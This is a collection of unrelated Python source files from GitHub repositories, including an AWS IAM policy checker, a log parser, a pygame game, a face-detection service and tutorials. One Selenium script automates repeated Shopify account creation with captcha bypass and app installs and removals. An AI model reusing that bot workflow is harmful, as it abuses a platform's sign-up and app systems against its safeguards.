len(policy_arn) < 20:\n raise ValueError(f'Policy arn \\'{policy_arn}\\' is shorter than 20 characters')\n\n policy_versions_paginator = iam_client.get_paginator(\n 'list_policy_versions') # type: mypy_boto3_iam.ListPolicyVersionsPaginator\n policy_versions_for_arn = policy_versions_paginator.paginate(PolicyArn=policy_arn)\n version: str\n for policy_versions_page in policy_versions_for_arn:\n for policy_version in policy_versions_page['Versions']:\n if policy_version['IsDefaultVersion']:\n version = policy_version['VersionId']\n break\n\n # noinspection PyUnboundLocalVariable\n default_policy_version = iam_client.get_policy_version(PolicyArn=policy_arn, VersionId=version)\n policy_document = json.dumps(default_policy_version['PolicyVersion']['Document'])\n else:\n policy = iam_client.get_role_policy(RoleName=role_name, PolicyName=policy_name)\n policy_document = json.dumps(policy['PolicyDocument'])\n\n policy_account_numbers = set(account_pattern_arn.findall(policy_document))\n if policy_account_numbers:\n print(f'Account numbers: {policy_account_numbers}')\n global account_numbers_found\n account_numbers_found = account_numbers_found | policy_account_numbers\n policy_account_numbers_suspicious = policy_account_numbers - account_numbers_allowed\n if policy_account_numbers_suspicious:\n print(f'Suspicious account numbers: {policy_account_numbers_suspicious}')\n except ValueError as e:\n raise e\n except Exception as e:\n print(e)\n retries += 1\n if is_named:\n get_and_check_policy(policy_name=policy_name, role_name=role_name, retries=retries, is_named=is_named)\n else:\n get_and_check_policy(policy_arn=policy_arn, retries=retries, is_named=is_named)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Kaputnik120/python","sub_path":"aws_foreign_account_checker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70993197352","text":"#!/usr/bin/env python3\n\n\"\"\"\n Given a date range, find the number of connections per stream.\n\n The syslog file is parsed for some metadata and put into an sqlite3 memory DB. \n Then this DB is queried and the connections per stream is deduced. \n \n\n parse(start_day, end_day) => [(connections, stream_name)]\n\n start_day: \"2020-06-22\"\n end_day: None\n connections: int\n stream_name: str\n\n\n Example:\n\n conn_per_stream = parse_db(\"2020-06-22\", None)\n\n # Only parse one day\n $ python3 parse_db.py 2020-06-22 \n []\n\"\"\"\n\nimport sqlite3\nimport mmap\nimport re\nfrom typing import List, Tuple\nimport datetime\nimport argparse \nimport os\nimport logging\nimport sys\n\nlog = logging.getLogger(__file__)\nlogging.basicConfig(\n level=logging.ERROR,\n format=f\"{__file__} [%(levelname)s] %(message)s\",\n handlers=[\n logging.FileHandler(\"/var/log/scripts.log\"),\n logging.StreamHandler(sys.stdout)\n ]\n)\n\nclass Parse:\n\n def __init__(self, start_day: str, end_day: str):\n\n self.conn = sqlite3.connect(':memory:')\n self.log_file_path = \"/var/log/syslog-ng/\"\n\n self._create_db()\n\n self.all_days = self._fill_in_days(start_day, end_day)\n\n def _fill_in_days(self, start_day: str, end_day: str) -> List[str]:\n\n end_day = end_day or start_day\n\n start_day_dt = datetime.datetime.strptime(start_day, \"%Y-%m-%d\")\n end_day_dt = datetime.datetime.strptime(end_day, \"%Y-%m-%d\")\n\n if start_day_dt > end_day_dt:\n end_day_dt, start_day_dt = start_day_dt, end_day_dt\n\n delta = end_day_dt - start_day_dt\n dd = [start_day_dt + datetime.timedelta(days=x) for x in range(delta.days + 1)]\n days = [datetime.datetime.strftime(d, \"%Y-%m-%d\") for d in dd]\n log.debug(f\"days filled in {days}\")\n return days\n\n def _get_log_file_names(self) -> str:\n\n logfiles = []\n for date in self.all_days:\n if os.path.exists(f\"{self.log_file_path}syslog-{date}.log\"):\n logfiles.append(f\"{self.log_file_path}syslog-{date}.log\")\n elif os.path.exists(f\"{self.log_file_path}syslog-{date}.log.zip\"):\n logfiles.append(f\"{self.log_file_path}syslog-{date}.log.zip\")\n\n log.debug(f\"Logs to be parsed: {logfiles}\")\n return logfiles\n\n def _create_db(self):\n try:\n with self.conn:\n self.conn.execute(\"CREATE TABLE stream (inserted timestamp, ip text, stream text, conn int)\")\n log.debug(\"Table stream created.\")\n except:\n log.debug(\"Table stream already exists. Skipping creation...\")\n\n def _insert_line(self, values: Tuple):\n with self.conn:\n self.conn.execute(\"INSERT INTO stream VALUES (?,?,?,?)\", values)\n \n def _get_num_unique_ip_per_minute(self):\n with self.conn:\n res = self.conn.execute(\"SELECT COUNT(DISTINCT ip), strftime('%Y-%m-%d %H:%M', inserted) FROM stream GROUP BY strftime('%Y-%m-%d %H:%M', inserted)\")\n return res.fetchall()\n\n def parse_log_to_db(self):\n comp_hls = re.compile(r\"^.* (\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}) - - \\[(.*)\\] \\\"GET \\/.*\\/hls\\/(.*_.*)\\/(.*)\\.ts HTTP\\/1\\.1\\\" (\\d\\d\\d) (\\d*) \\\".*\\\" (.*) \\\"(.*)\\\"$\")\n comp_dash = re.compile(r\"^.* (\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}) - - \\[(.*)\\] \\\"GET \\/.*\\/dash\\/(.*)\\/(.*)\\.m4a HTTP\\/1\\.1\\\" (\\d\\d\\d) (\\d*) \\\".*\\\" (.*) \\\"(.*)\\\"$\")\n \n # Copy current syslog file to temp\n # This is to ensure that we don't block the file for system writing\n # Parse over time range, and add to DB\n for log_file in self._get_log_file_names(): \n with open(log_file, 'rb') as f:\n m = mmap.mmap(f.fileno(), 0, prot=mmap.PROT_READ)\n\n line = m.readline()\n while line:\n res_hls = comp_hls.match(line.decode(\"utf-8\"))\n if res_hls:\n # Ref proper groups\n # 1: container ip, 2: stream datetime, 3: stream name, 4: fragment number, 5: http code, 6: bytes, 7: connection number, 8: forward ip\n timestamp = datetime.datetime.strptime(res_hls.group(2), '%d/%b/%Y:%H:%M:%S +0000')\n tup = (\n timestamp, \n res_hls.group(8), \n res_hls.group(3),\n res_hls.group(7) \n )\n self._insert_line(tup)\n\n res_dash = comp_dash.match(line.decode(\"utf-8\"))\n if res_dash:\n # Ref proper groups\n # 1: container ip, 2: stream datetime, 3: stream name, 4: fragment number, 5: http code, 6: bytes, 7: connection number, 8: forward ip\n timestamp = datetime.datetime.strptime(res_dash.group(2), '%d/%b/%Y:%H:%M:%S +0000')\n tup = (\n timestamp, \n res_dash.group(8), \n res_dash.group(3),\n res_dash.group(7) \n )\n self._insert_line(tup)\n\n line = m.readline()\n\n def get_connections_per_stream(self) -> List[Tuple[int, str]]:\n # Open DB and parse per stream, returning connections per stream\n if log.isEnabledFor(logging.DEBUG): \n with self.conn:\n for row in self.conn.execute(\"SELECT * FROM stream\"):\n log.debug(row)\n\n return self._get_num_unique_ip_per_minute()\n\ndef parse_db(start_day, end_day, log_level='error'):\n if log_level == 'debug':\n log.setLevel(logging.DEBUG)\n elif log_level == 'info':\n log.setLevel(logging.INFO)\n \n p = Parse(start_day, end_day)\n p.parse_log_to_db()\n c = p.get_connections_per_stream()\n log.info(c)\n return c \n\nif __name__ == \"__main__\":\n\n right_now = datetime.datetime.strftime(datetime.datetime.now(), \"%Y-%m-%d\")\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"start_day\", nargs=\"?\", default=right_now, help='2020-06-22')\n parser.add_argument(\"end_day\", nargs=\"?\", help='2020-06-23')\n parser.add_argument(\"--log-level\", dest=\"log_level\")\n args = parser.parse_args()\n\n parse_db(args.start_day, args.end_day, args.log_level)\n","repo_name":"ericlundell/nginx-webcast","sub_path":"web/parse_db.py","file_name":"parse_db.py","file_ext":"py","file_size_in_byte":6444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12912798060","text":"import sys #python标准库模块 事件循环检查\r\n\r\nimport pygame \r\nfrom bullet import Bullet\r\nfrom alien import Alien\r\nfrom random import randint\r\nfrom time import sleep\r\n\r\ndef check_keydown_events(event, ai_settings,screen, ship ,bullets):\r\n\tif event.key == pygame.K_RIGHT:\r\n\t\tship.moving_right = True\r\n\telif event.key == pygame.K_LEFT:\r\n\t\t#飞船左移\r\n\t\tship.moving_left = True\r\n\telif event.key == pygame.K_UP:\r\n\t\tship.moving_up = True\r\n\telif event.key == pygame.K_DOWN:\r\n\t\tship.moving_down = True\r\n\telif event.key == pygame.K_SPACE:\r\n\t\tfire_bullets(ai_settings,screen, ship ,bullets)\r\n\telif event.key == pygame.K_q:\r\n\t\tsys.exit()\r\n \r\ndef check_keyup_events(event, ship):\r\n\tif event.key == pygame.K_RIGHT:\r\n\t\tship.moving_right = False\r\n\telif event.key == pygame.K_LEFT:\t\r\n\t\tship.moving_left = False\r\n\telif event.key == pygame.K_UP:\r\n\t\tship.moving_up = False\r\n\telif event.key == pygame.K_DOWN:\r\n\t\tship.moving_down = False\r\n\r\ndef check_events(ai_settings,screen, ship ,bullets, stats, play_button,\r\n\t\taliens, scoreboard):\r\n\t\t#监听键盘鼠标事件\r\n\tfor event in pygame.event.get():\r\n\t\tif event.type == pygame.QUIT:\r\n\t\t\tsys.exit()\r\n\t\telif event.type == pygame.KEYDOWN:\r\n\t\t\tcheck_keydown_events(event,ai_settings,screen, ship ,bullets)\r\n\t\telif event.type == pygame.KEYUP:\r\n\t\t\tcheck_keyup_events(event, ship)\t\r\n\t\telif event.type == pygame.MOUSEBUTTONDOWN:\r\n\t\t\tmouse_x, mouse_y = pygame.mouse.get_pos()\r\n\t\t\tcheck_play_button(stats, play_button, mouse_x, mouse_y, aliens, \r\n\t\t\t\tbullets, ai_settings, screen, ship, scoreboard)\r\n\r\ndef check_play_button(stats, play_button, mouse_x, mouse_y, aliens, \r\n\tbullets,ai_settings, screen, ship, scoreboard):\r\n\t#点击按钮开始游戏\r\n\tbutton_clicked = play_button.rect.collidepoint(mouse_x, mouse_y)\r\n\tif button_clicked and not stats.game_active:\r\n\t\t#重置游戏设置\r\n\t\tai_settings.initialize_dymamic_settings()\r\n\t\t#隐藏光标\r\n\t\tpygame.mouse.set_visible(False)\r\n\t\t#重置上一局游戏信息\r\n\t\tstats.reset_stats()\r\n\r\n\t\tstats.game_active = True\r\n\r\n\t\t#重置记仇牌图像\r\n\t\tscoreboard.prep_score()\r\n\t\tscoreboard.prep_high_score()\r\n\t\tscoreboard.prep_level()\r\n\t\tscoreboard.prep_ships()\r\n\r\n\r\n\t\t#清空机器人和子弹列表\r\n\t\taliens.empty()\r\n\t\tbullets.empty()\r\n\r\n\t\t#创建新外星人,飞船居中\r\n\t\tcreate_fleet(ai_settings, screen, aliens, ship)\r\n\t\tship.center_ship()\r\n\r\n\r\n\r\ndef update_screen(ai_settings,screen, ship , aliens, bullets,\r\n\t\tstats, play_button, scoreboard):\r\n\t#每次循环都重绘屏幕\t\r\n\tbackground = pygame.image.load(\r\n\t\t\"E:/Python_demo/alien_invasion/pic/background.jpeg\")\r\n\tscreen.blit(background,(0,0))\r\n\r\n\t#在飞船和外星人后面重绘所有子弹\r\n\tfor bullet in bullets.sprites():\r\n\t\tbullet.draw_bullet()\r\n\r\n\r\n\tship.blitme()\r\n\taliens.draw(screen)\r\n\tscoreboard.show_score()\r\n\r\n\t#如果游戏处于非活动状态,绘制Play 按钮\r\n\tif not stats.game_active:\r\n\t\tplay_button.draw_button()\r\n\t#显示窗口\r\n\tpygame.display.flip()\r\n\r\ndef fire_bullets(ai_settings,screen, ship ,bullets):\r\n\tif len(bullets) <= ai_settings.bullet_allowde:\r\n\t\tnew_bullet = Bullet(ai_settings, screen, ship)\r\n\t\tbullets.add(new_bullet)\r\n\r\ndef revome_bullets(bullets, aliens, ai_settings, screen, ship, stats, scoreboard):\r\n\tbullets.update()\r\n\t#删除消失的子弹\r\n\tfor bullet in bullets.copy():\t\r\n\t\tif bullet.rect.bottom <= 0:\r\n\t\t\tbullets.remove(bullet)\r\n\t\t\tprint(len(bullets))\t\r\n\tcheck_bullet_alien_collisions(ai_settings, screen, ship, aliens,\r\n\t\tbullets, stats, scoreboard)\r\n\r\ndef check_bullet_alien_collisions(ai_settings, screen, ship, aliens,\r\n\t\tbullets, stats, scoreboard):\r\n\t# 检查是否有子弹击中了外星人\r\n\t# 如果是,就删除相应的子弹和外星人\r\n\tcollisions = pygame.sprite.groupcollide(bullets, aliens, True, True)\r\n\r\n\tif collisions:\r\n\t\tfor aliens in collisions.values():\r\n\t\t\t#一次击落多个外星人时,统计之数之和\r\n\t\t\tstats.score += ai_settings.alien_points*len(aliens)\r\n\t\t\tscoreboard.prep_score()\r\n\t\tcheck_high_score(stats, scoreboard)\t\r\n\r\n\tif len(aliens) == 0:\r\n\t\tbullets.empty()\r\n\t\tai_settings.increase_speed()\r\n\r\n\t\t#提高等级\r\n\t\tstats.level += 1\r\n\t\tscoreboard.prep_level()\r\n\r\n\t\tcreate_fleet(ai_settings, screen, aliens, ship)\t\r\n\r\ndef check_high_score(stats, scoreboard):\r\n\tif stats.score > stats.high_score:\r\n\t\tstats.high_score = stats.score\r\n\t\tscoreboard.prep_high_score()\r\n\r\n\r\ndef create_fleet(ai_settings, screen, aliens, ship):\r\n\t\r\n\talien = Alien(ai_settings, screen)\r\n\t#计算每行个数\r\n\talien_num = get_number_aliens_x(ai_settings, alien.rect.width)\r\n\tnumber_rows = get_number_aliens_y(ai_settings, alien.rect.height, ship)\r\n\t#创建外星人群\r\n\tfor row_y in range(number_rows):\r\n\t\tfor num_x in range(alien_num):#(randint(-10,10)):\r\n\t\t\tcreate_alien(ai_settings, screen, aliens, num_x, row_y)\r\n\r\n\r\ndef get_number_aliens_x(ai_settings, alien_width):\r\n\t#每行外星人个数\r\n\tavailable_space_x = ai_settings.screen_width - (2*alien_width)\r\n\tnumber_available_x = int(available_space_x / (2*alien_width))\r\n\treturn number_available_x\r\n\r\ndef create_alien(ai_settings, screen, aliens, alien_num, row_num):\r\n\talien = Alien(ai_settings, screen)\r\n\talien.x = alien.rect.width + 2*alien.rect.width*alien_num\r\n\talien.y = alien.rect.height + 2*alien.rect.height*row_num\r\n\talien.rect.x = alien.x\r\n\talien.rect.y = alien.y\r\n\taliens.add(alien)\r\n\r\ndef get_number_aliens_y(ai_settings, alien_height, ship):\r\n\tavailable_space_y = ai_settings.screen_height -\\\r\n\t\t\t\t\t\t(3*alien_height) - ship.rect.height\r\n\tnumber_rows = int(available_space_y/(2*alien_height))\r\n\treturn number_rows\r\n\r\ndef update_alients(aliens, ai_settings, ship, screen, bullets, stats, scoreboard):\r\n\tcheck_fleet_edges(ai_settings, aliens)\r\n\taliens.update(ai_settings)\r\n\r\n\t#检查外星人碰撞\r\n\tif pygame.sprite.spritecollideany(ship, aliens):\r\n\t\tship_hit(aliens, ai_settings, ship, screen, bullets, stats, scoreboard)\r\n\t#检查是否有外星人到底端\r\n\tcheck_aliens_bottom(ai_settings, stats, screen, ship, aliens, bullets, scoreboard)\r\n\r\ndef check_fleet_edges(ai_settings, aliens):\r\n\t#检测是否到边缘\r\n\tfor alien in aliens.sprites():\r\n\t\tif alien.check_edges():\r\n\t\t\t#下移并反向\r\n\t\t\tchange_fleet_dirction(ai_settings, aliens)\r\n\t\t\tbreak\r\n\r\ndef change_fleet_dirction(ai_settings, aliens):\r\n\t#外星人下移并改变方向\r\n\tfor alien in aliens.sprites():\r\n\t\talien.rect.y += ai_settings.fleet_drop_speed\r\n\tai_settings.fleet_direction *= -1\r\n\r\ndef ship_hit(aliens, ai_settings, ship, screen, bullets, stats, scoreboard):\r\n\tif stats.ships_left > 0:\r\n\t\t#外星人撞飞船\r\n\t\tstats.ships_left -= 1\r\n\r\n\t\t#更新记仇牌\r\n\t\tscoreboard.prep_ships()\r\n\r\n\t\t#清空外星人列表\r\n\t\taliens.empty()\r\n\t\tbullets.empty()\r\n\t\t#创建新一批外星人\r\n\t\tcreate_fleet(ai_settings, screen, aliens, ship)\r\n\t\tship.center_ship()\r\n\t\tsleep(1.5)\r\n\telse:\r\n\t\tstats.game_active = False\r\n\t\tpygame.mouse.set_visible(True)\r\n\r\ndef check_aliens_bottom(ai_settings, stats, screen, ship, aliens, bullets, scoreboard):\r\n\t#检查是否有外星人到底端\r\n\tscreen_rect = screen.get_rect()\r\n\tfor alien in aliens.sprites():\r\n\t\tif alien.rect.bottom >= screen_rect.bottom:\r\n\t\t\tship_hit(aliens, ai_settings, ship, screen, bullets, stats, scoreboard)\r\n\t\t\tbreak\r\n\r\n","repo_name":"KerwinWW/alien_invasion-","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":7129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17521612895","text":"from xpcom import components, ServerException\n\nfrom koLanguageServiceBase import *\n\nclass koBullantLanguage(KoLanguageBase):\n name = \"Bullant\"\n _reg_desc_ = \"%s Language\" % name\n _reg_contractid_ = \"@activestate.com/koLanguage?language=%s;1\" \\\n % (name)\n _reg_clsid_ = \"{96A10671-291B-4000-A51E-899C933A2CA7}\"\n _reg_categories_ = [(\"komodo-language\", name)]\n\n defaultExtension = \".ant\"\n commentDelimiterInfo = {\n \"line\": [ \"#\" ],\n \"block\": [ (\"@off\", \"@on\") ],\n }\n \n def __init__(self):\n KoLanguageBase.__init__(self)\n self._style_info.update(\n _block_comment_styles = [sci_constants.SCE_C_COMMENTLINE,\n sci_constants.SCE_C_COMMENT]\n )\n \n def get_lexer(self):\n if self._lexer is None:\n self._lexer = KoLexerLanguageService()\n self._lexer.setLexer(components.interfaces.ISciMoz.SCLEX_BULLANT)\n self._lexer.setKeywords(0, self._keywords)\n return self._lexer\n\n _keywords = [\"abstract\", \"all\", \"ancestor\", \"and\", \"application\" \\\n \"assert\", \"attributes\", \"author\", \"begin\" \\\n \"callback\", \"class\", \"concrete\", \"config\", \"constants\", \"construct\", \"continue\" \\\n \"depends\", \"description\", \"downcast\", \"driver\" \\\n \"elif\", \"else\", \"ensures\", \"error\", \"exception\", \"exposure\", \"extension\" \\\n \"false\", \"fatal\", \"final\", \"function\", \"generics\", \"glyph\" \\\n \"help\", \"hidden\", \"host\", \"immutable\", \"in\", \"inherits\", \"is\" \\\n \"kernel\", \"label\", \"leave\", \"library\", \"locals\" \\\n \"mutable\", \"none\", \"not\", \"null\", \"obsolete\", \"options\", \"or\", \"other\" \\\n \"parameters\", \"peer\", \"private\", \"public\" \\\n \"raise\", \"reason\", \"restricted\", \"retry\", \"return\" \\\n \"returns\", \"rollback\", \"route\" \\\n \"security\", \"self\", \"settings\", \"severity\", \"step\" \\\n \"task\", \"test\", \"transaction\", \"true\" \\\n \"unknown\", \"varying\", \"warning\", \"when\" \\\n \"method\", \"end\", \"if\", \"until\", \"while\", \"trap\", \"case\", \"debug\", \"for\", \"foreach\", \"lock\" \\\n \"boolean\", \"character\", \"character$\", \"date\", \"date$\", \"datetime\", \"datetime$\" \\\n \"float\", \"hex$\", \"identifier\", \"identifier$\", \"integer\", \"interval\", \"interval$\" \\\n \"money\", \"money$\", \"raw\", \"raw$\", \"string\", \"tick\", \"tick$\", \"time\", \"time$\" \\\n \"version\", \"version$\"]\n\n","repo_name":"ActiveState/OpenKomodoIDE","sub_path":"src/languages/koBullantLanguage.py","file_name":"koBullantLanguage.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":460,"dataset":"github-code","pt":"72"} +{"seq_id":"37580620008","text":"import asyncio\nimport logging\nfrom typing import List, Tuple\n\nfrom numpy import ndarray\n\nfrom abs import BaseDownloader, BaseUrlScraper, BaseUploader, BaseFaceDetector\n\nlogger = logging.getLogger(__name__)\n\n\nclass FaceService:\n \"\"\"\n The main service logic.\n Combines all pieces together.\n \"\"\"\n\n def __init__(self,\n url_parser: BaseUrlScraper,\n downloader: BaseDownloader,\n uploader: BaseUploader,\n face_detector: BaseFaceDetector):\n self._url_parser = url_parser\n self._downloader = downloader\n self._uploader = uploader\n self._face_detector = face_detector\n logger.info(\"Started face service.\")\n\n async def _process_image_url(self, image_url: str) -> List[ndarray]:\n \"\"\"\n Process a single image: download and extract faces\n :param image_url: image url\n :return: list of face images\n \"\"\"\n image_bytes = await self._downloader.download(image_url)\n faces = await self._face_detector.detect_faces(image_bytes)\n return faces\n\n async def _process_image_urls(self, image_urls: List[str]) -> List[Tuple[str, List[ndarray]]]:\n \"\"\"\n Wait for all images to be processed and return all faces found\n :param image_urls: list of images urls\n :return: image url to faces tuples\n \"\"\"\n per_image_faces = await asyncio.gather(*[self._process_image_url(url) for url in image_urls],\n return_exceptions=True)\n\n # get rid of exceptions and make url->faces tuples\n url_and_faces = [(url, faces) if isinstance(faces, list) else (url, [])\n for url, faces in zip(image_urls, per_image_faces)]\n return url_and_faces\n\n async def _upload_faces(self, initial_url: str, image_url_and_faces: List[Tuple[str, List[ndarray]]]):\n tasks = []\n for image_url, image_faces in image_url_and_faces:\n for face_index, face_image in enumerate(image_faces):\n tasks.append(self._uploader.upload_image(initial_url, image_url, face_index, face_image))\n\n uploaded_flags = await asyncio.gather(*tasks, return_exceptions=True)\n faces_processed = sum(1 if isinstance(flag, bool) else 0 for flag in uploaded_flags)\n return faces_processed\n\n async def get_faces(self, url: str):\n \"\"\"\n - Downloads images attached url\n - Finds all faces on the each image\n - Saves aligned faces by using 'uploader'\n - Returns count of faces\n :param url:\n :return:\n \"\"\"\n image_urls = await self._url_parser.get_url_images(url)\n url_and_faces = await self._process_image_urls(image_urls)\n faces_processed = await self._upload_faces(url, url_and_faces)\n return faces_processed\n","repo_name":"sergeyleyko/fast_face_finder","sub_path":"app/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32592856976","text":"# coding=utf-8\nfrom __future__ import unicode_literals\nfrom sakku import Application, SakkuException, HttpException\nfrom examples.config import *\n\ntry:\n app = Application(api_key=API_KEY)\n\n # from_date = 1584200002261\n # to_date = 1584283592261\n from_date = None\n to_date = None\n save_to = None # or file path eg. /tmp/2664.log\n response = app.logs_export(app_id=APP_ID, from_date=from_date, to_date=to_date, save_to=save_to)\n print(response)\n # OUTPUT\n #\n\n # print(app.last_response().original_result()) # get raw result\n # print(app.last_response()) # get response handler\n\nexcept HttpException as e:\n print(\"Http Exception\\nMessage : {}\\nStatus Code : {}\\n\".format(e.message, e.status_code))\n # print(e.response_handler)\nexcept SakkuException as e:\n print(\"Sakku Exception\\nMessage : {}\".format(e.message))\n","repo_name":"FanapSoft/sakku-python-sdk","sub_path":"examples/application/08_logs_export.py","file_name":"08_logs_export.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1165336810","text":"import pandas as pd\n\n# Data filepaths\nTRAIN_FILEPATH = 'input/train.csv'\nTEST_FILEPATH = 'input/test.csv'\nSUBMISSION_FILEPATH = 'output/submission.csv'\n\n\n# Given two strings, compute their Jaccard index.\ndef jaccard(str1, str2):\n set1 = set(str1.split())\n set2 = set(str2.split())\n intersection = set1.intersection(set2)\n union = set1.union(set2)\n return len(intersection) / len(union)\n\n\n# Given an array of tweets and an array of selections to validate with, compute\n# the average Jaccard score for the whole set.\ndef validate(tweets, selects):\n n = len(tweets)\n \n total = 0\n for i in range(n):\n total += jaccard(str(tweets[i]), str(selects[i]))\n \n return total / n\n\n\ndef main():\n # Read validation data\n csv_tr = pd.read_csv(TRAIN_FILEPATH)\n tweet_va = csv_tr.iloc[:, 1] # Full tweets\n select_va = csv_tr.iloc[:, 2] # Selected texts\n \n # Read testing data\n csv_te = pd.read_csv(TEST_FILEPATH)\n id_te = csv_te.iloc[:, 0] # Tweet IDs\n tweet_te = csv_te.iloc[:, 1] # Full tweets\n \n # Get the validation score when using the whole tweet as the prediction\n validation_score = validate(tweet_va, select_va)\n print('Validation score: {0:0.5f}'.format(validation_score))\n \n # Create a submission for the test data in this fashion\n submission = {'textID': list(id_te), 'selected_text': list(tweet_te)}\n pd.DataFrame(submission).to_csv(SUBMISSION_FILEPATH, index=False)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"svadivazhagu/Tweet-Sentiment-Extraction","sub_path":"Shallow/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2064910471","text":"import sys\nimport pymysql\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nclass ASIC():\n def __init__(self):\n #get the environmental parameters from the unix interface\n self.username=os.getenv(\"muon_array_sql_username\")\n self.password=os.getenv(\"muon_array_sql_password\")\n self.port=int(os.getenv(\"muon_array_sql_port\"))\n self.host=os.getenv(\"muon_array_sql_host\")\n self.dbname=os.getenv(\"muon_array_sql_dbname\")\n def initial_connection(self):\n # Initialize the maria database \n try :\n self.conn=pymysql.connect(user=self.username,password=self.password,host=self.host,port=self.port,database=self.dbname)\n print(\"mariadb connected successfully!\")\n except pymysql.Error as e:\n print(\"Error connecting to MariaDB platform {}\".format(e)) \n self.cur=self.conn.cursor()\n self.cur.execute(\"use local\")\n # cur is short for cursor and conn is short for connection\n # Different from pymongo , mariadb is to convey string command that should be used by the command line\n def close_connection(self):\n self.conn.close()\n def get_record(self):\n record=self.cur.execute(\"select * from raw_data;\")\n result=self.cur.fetchall()\n return result\n # \"result\" stores two columns from mariadb ,which are \"time\" and \"amplitude\". \n def listlength(self):\n self.cur.execute(\"use information_schema\")\n receive=self.cur.execute(\"select table_name,table_rows from tables where TABLE_SCHEMA = 'local' AND table_name='raw_data';\")\n result=self.cur.fetchone()\n self.cur.execute(\"use local\")\n return result[1]\n # this function counts the number of records that satisfies the search criteria.\nif __name__==\"__main__\":\n asic=ASIC()\n asic.initial_connection()\n out=np.array(asic.get_record())\n y=out[:,1]\n # We only focus on the \"amplitude\" as the shape of the data is what really matters.\n length=asic.listlength()\n x=np.array([i for i in range(1,(length+1))])\n plt.figure(figsize=(100,50),dpi=100)\n plt.plot(x,y) \n # Details of the figure still needs to be added\n plt.show()\n plt.savefig('test.png')\n # We can choose to build a 'log' document for this part, in order to store all the figures temporarily.\n","repo_name":"Euchupi/muon_array_DAQ","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31351134234","text":"from selenium import webdriver\nfrom selenium.webdriver import ChromeOptions\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom webdriver_manager.chrome import ChromeDriverManager\n\ndef get_options():\n options = ChromeOptions()\n options.add_argument(\"--incognito\")\n options.add_argument(\"window-size=1400,1500\")\n return options\n\ndef main(cycles, api_key, shopify_apps):\n options = get_options()\n service = Service(ChromeDriverManager().install())\n print(\"\")\n for i in range(cycles):\n driver = webdriver.Chrome(service = service, options = options)\n print(\"Starting cycle #\" + str(i + 1))\n try:\n run_service(driver, api_key, shopify_apps)\n print(\"Finished cycle #\" + str(i + 1))\n except Exception as e:\n print(e)\n continue\n finally:\n print(\"\")\n\ndef standard_flow(driver, shopify_apps):\n automation.account_creation_1.main(driver)\n automation.account_creation_2.main(driver)\n\n WebDriverWait(driver, 200).until(lambda driver: driver.current_url.endswith(\"admin\"))\n admin_url = driver.current_url\n\n for shopify_app in shopify_apps:\n automation.app_page.main(driver, shopify_app)\n \n WebDriverWait(driver, 200).until(lambda driver: \"apps\" not in driver.current_url)\n if(\"choose\" in driver.current_url or True):\n automation.login_intercept.main(driver)\n automation.app_authorization.main(driver)\n \n driver.get(admin_url + \"/apps\")\n automation.delete_app.main(driver)\n\ndef captcha_flow(driver, api_key):\n automation.alternate_sign_up_form.main(driver, api_key)\n WebDriverWait(driver, 200).until(lambda driver: driver.current_url.endswith(\"/admin/account_setup\"))\n\nimport automation\n\ndef run_service(driver, api_key, shopify_apps):\n automation.home_page.main(driver)\n automation.sign_up_form.main(driver)\n WebDriverWait(driver, 200).until(lambda driver: driver.current_url != \"https://www.shopify.com/\")\n if(driver.current_url != \"https://accounts.shopify.com/store-signup/setup\"):\n captcha_flow(driver, api_key)\n standard_flow(driver, shopify_apps)","repo_name":"zackyvt/shopify_automation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18185674185","text":"# A dictionary is a key-value pair where the key is a hashable data type (string or int)\n\nfriend_ages = {\"Alice\": 25, \"Bob\": 27, \"Charlie\": 30}\n\n# getting keys - iterating by index won't work, you have to use the key:\nprint(friend_ages[\"Alice\"])\n\n# adding new pairs or modifying existing ones:\nfriend_ages[\"Declan\"] = 22\n\n\n# dictionary list - normally, dictionaries have multiple items, best stored in a list\nfriends = [\n {\"name\":\"Alice\", \"age\":25},\n {\"name\":\"Bob\", \"age\":27},\n {\"name\":\"Charlie\", \"age\":30}\n ]\n\n# now you can use index to access particular k-v pairs (because this is a list of dicts):\nprint(friends[0]) # prints the entire dictionary (all pairs)\nprint(friends[0][\"name\"]) # prints value for selected key\n\n\n# iterating over a dictionary:\nstudent_attendance = {\"Alice\": 98, \"Bob\": 95, \"Charlie\": 85}\n\nfor student in student_attendance:\n print(student) # will only print the keys!\n print(f\"{student}: {student_attendance[student]}\") # prints key + value for that key\n\n# a nicer way to do the above:\nfor student, attendance in student_attendance.items():\n print(f\"{student}: {attendance}\") # two variables in for-loop are linked to key and value, respectively\n\n\n# getting just the values:\nattendance = student_attendance.values()\nprint(sum(attendance)/len(attendance))\n","repo_name":"Narvienn/AutomateSoftwareTesting_Udemy","sub_path":"22 Dictionaries.py","file_name":"22 